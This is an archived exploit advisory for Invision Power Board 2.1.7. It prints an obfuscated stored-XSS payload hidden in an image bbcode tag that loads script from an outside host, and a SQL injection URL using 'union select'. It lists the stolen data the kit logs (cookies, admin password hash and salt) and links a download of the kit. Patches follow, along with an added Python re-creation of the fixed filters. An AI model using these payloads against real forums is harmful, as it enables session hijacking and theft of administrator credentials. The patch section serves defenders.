
ipb217-xsssql.txt
Posted Jan 6, 2008
Authored by Eugene Minaev | Site itdefence.ru

Invision Power Board version 2.1.7 suffers from cross site scripting and SQL injection vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 0f3e90fbbd4992ce6f7537f6aaf508d48434d3246f13f3ab1d5715b661bed087

----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]

INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
Eugene Minaev underwater@itdefence.ru
-[ ITDEFENCE.ru Security advisory ]- 2007

----[ NITRO ... ]

This vulnerability was already found before, but there was no publicly available working exploit for it.
This POC consists of several parts: an active XSS generator, a JS file which is loaded when a page
containing the XSS is visited, a log viewer, and a special component which takes the necessary data
from the forum's MySQL tables if the intercepted session belonged to a user with moderator privileges.

----[ ANALYSIS ... ]

XSS.php is one of the most important parts of the IPB 2.1.7 POC package, as it generates the XSS for
later injection into the forum board. As the reference it is necessary to specify the full path to the
ya.js file (in which you have already adjusted the path yourself beforehand). Most likely all that
remains is to press the button.

[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
style=visibility:hidden =[/snapback].gif[/img]

The injection can be executed only when a session of a user with access to the moderator panel is
available. The fix is to cast the "starter" parameter to an integer with the intval() function. In case
of a successful injection there is an opportunity to enumerate the forum's administrator team:

index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*

----[ RECORD ... ]
{

---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt

}

----[ PATCH ... ]

FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
regex_check_image
LINE
924
REPLACE
if ( preg_match( "/[?&;]/", $url) )
ON
if ( preg_match( "/[?&;\<\[]/", $url) )


FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
post_db_parse_bbcode
LINE
486
REPLACE
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
ON
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );

if ( $row['bbcode_tag'] == 'snapback' )
{
$match[2][$i] = intval( $match[2][$i] );
}
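As an added stand-alone illustration (not IPB's code, not part of the advisory), the following Python re-creates the two patched checks above and runs them against constructed inputs modelled on the advisory's payload and injection string: the pre-patch image URL filter lets a URL carrying a [snapback] tag through because it contains none of "?&;", the patched filter rejects it on "[", and intval() reduces both the snapback body and the "starter" parameter to a plain integer.

```python
import re

# Pre-patch test from regex_check_image: only '?', '&' and ';' are rejected.
VULN_URL_RE = re.compile(r"[?&;]")
# Patched test: '<' and '[' are rejected too, so bbcode/HTML cannot be smuggled in.
PATCHED_URL_RE = re.compile(r"[?&;<\[]")

# Same tag pattern as post_db_parse_bbcode, with $preg_tag fixed to 'snapback'.
SNAPBACK_RE = re.compile(
    r"(\[snapback\])((?!\[/snapback\]).+?)?(\[/snapback\])", re.S | re.I
)


def image_url_allowed(url: str, patched: bool) -> bool:
    """True if regex_check_image would accept the URL (before/after the patch)."""
    pattern = PATCHED_URL_RE if patched else VULN_URL_RE
    return pattern.search(url) is None


def php_intval(value: str) -> int:
    """Approximation of PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def parse_snapback(text: str, patched: bool) -> list:
    """Inner value of every [snapback]...[/snapback] tag; cast with intval()
    when the post_db_parse_bbcode patch is applied."""
    inner = [m.group(2) or "" for m in SNAPBACK_RE.finditer(text)]
    return [php_intval(v) for v in inner] if patched else inner


# Constructed samples (hypothetical, simplified from the advisory's strings).
XSS_URL = "http://www.ya.ru/[snapback] onerror=alert(1) style=visibility:hidden =[/snapback].gif"
CLEAN_URL = "http://www.ya.ru/logo.gif"
STARTER_PARAM = "1 union select 1/*"

if __name__ == "__main__":
    for label, patched in (("pre-patch", False), ("patched", True)):
        print(label, "image check:", image_url_allowed(XSS_URL, patched))
        print(label, "snapback:", parse_snapback(XSS_URL, patched))
    print("starter ->", php_intval(STARTER_PARAM))
```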



www.underwater.itdefence.ru/isniff.rar

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]